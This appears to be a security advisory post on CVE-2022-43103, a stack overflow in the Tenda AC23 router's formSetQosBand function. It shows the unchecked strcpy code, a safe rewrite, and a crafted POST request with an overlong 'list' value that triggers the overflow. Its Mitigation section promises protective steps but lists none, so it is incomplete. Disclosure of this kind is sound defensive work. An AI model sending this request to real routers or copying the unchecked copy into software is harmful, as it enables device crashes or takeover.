A recent vulnerability, CVE-2022-43103, was discovered in Tenda AC23 V16.03.07.45_cn, a popular Wi-Fi router. This vulnerability directly affects the router's formSetQosBand function, which contains a stack overflow via the list parameter. In this post, we'll be discussing the details of the vulnerability, its consequences, and potential mitigation strategies.

Vulnerability Details

CVE-2022-43103 describes a vulnerability found in a specific version (V16.03.07.45_cn) of the Tenda AC23 Wi-Fi router. A stack overflow of this kind occurs when a program writes more data into a stack-allocated buffer than the buffer can hold, overwriting adjacent stack memory.

In this case, the stack overflow occurs within the formSetQosBand function, which is responsible for setting the Quality of Service (QoS) bandwidth preferences for the router. The function reads the list parameter from the request, and the handling of that parameter is the main cause of the vulnerability.

Here is a code snippet showcasing the problematic portion of the implementation:

void formSetQosBand(request *req, char *post_data)
{
    ...
    char list[64];
    int n, index, enable;
    ...

    strcpy(list, get_cstream_var(post_data, "list", ""));
    if(sscanf(list, "%d,%d", &index, &enable) != 2)
    {
        return;
    }
    ...
}

As seen in the code snippet above, the 'list' buffer is limited to 64 bytes. However, 'strcpy' copies the 'list' value from 'post_data' without checking its length, and 'sscanf' only parses the buffer after that copy, so nothing stops an oversized value from overflowing the stack buffer.

When an attacker sends a POST request with a crafted 'list' value containing more than 64 characters, an overflow can occur, causing undefined behavior or potentially leading to remote code execution (RCE) under certain conditions. This poses a significant security risk for the users of the affected Tenda AC23 router.
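A length-checked version of the same parsing step, as an added example (not Tenda's code and not a vendor patch). The names parse_qos_list, parse_int and QOS_LIST_MAX are hypothetical; the 64-byte buffer and the "index,enable" format are taken from the snippet above.

```c
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>

#define QOS_LIST_MAX 64 /* same size as the 'list' buffer in the snippet */

/* Hypothetical helper: parse one decimal int that must be followed by
 * 'stop'. Rejects empty fields, trailing junk and out-of-range values. */
static int parse_int(const char *s, char stop, const char **next, int *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != stop || errno == ERANGE ||
        v < INT_MIN || v > INT_MAX)
        return -1;
    *out = (int)v;
    *next = end + 1;
    return 0;
}

/* Hypothetical replacement for the strcpy + sscanf pair.
 * Returns 0 and fills index/enable on success, -1 on any invalid input. */
int parse_qos_list(const char *value, int *index, int *enable)
{
    char list[QOS_LIST_MAX];
    const char *p;
    size_t len;

    if (value == NULL || index == NULL || enable == NULL)
        return -1;

    /* Check the length before copying: the value plus its NUL
     * terminator must fit, so at most 63 characters are accepted. */
    len = strlen(value);
    if (len >= sizeof(list))
        return -1;
    memcpy(list, value, len + 1);

    if (parse_int(list, ',', &p, index) != 0)
        return -1;
    return parse_int(p, '\0', &p, enable);
}
```

An oversized value is rejected before any byte is written to the stack buffer, so the request fails cleanly instead of corrupting memory.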

- The original CVE entry can be found here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43103

- Details on the affected Tenda product and version can be found on the vendor's website: https://www.tendacn.com/en/product/ac23.html

Exploit

An attacker can exploit this vulnerability by sending a crafted POST request with an extended 'list' parameter value to the router's administrative interface. To achieve this, a valid session cookie is required. While exploiting routers generally requires the attacker to be on the same network, specific remote scenarios may also be possible.

Here's an example of a crafted POST request that could trigger the stack overflow:

POST /goform/formSetQosBand HTTP/1.1
Host: Router_IP_Address
Cookie: SESSIONID=<Valid Session ID>
Content-Type: application/x-www-form-urlencoded
Content-Length: XX

list=11111111112222222222333333333344444444445555555555666666666677777777778888%2C1

Mitigation

Currently, there's no known patch or update from Tenda addressing this vulnerability. As a user, you can take the following steps to protect yourself from potential attacks:

Conclusion

The Tenda AC23 V16.03.07.45_cn router is affected by a stack overflow vulnerability, where an incorrectly handled list parameter in the formSetQosBand function can lead to a possible attack. Users of the affected router should be aware of this vulnerability, monitor for firmware updates from Tenda, and follow best practices to protect their networks and devices.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:20:00 UTC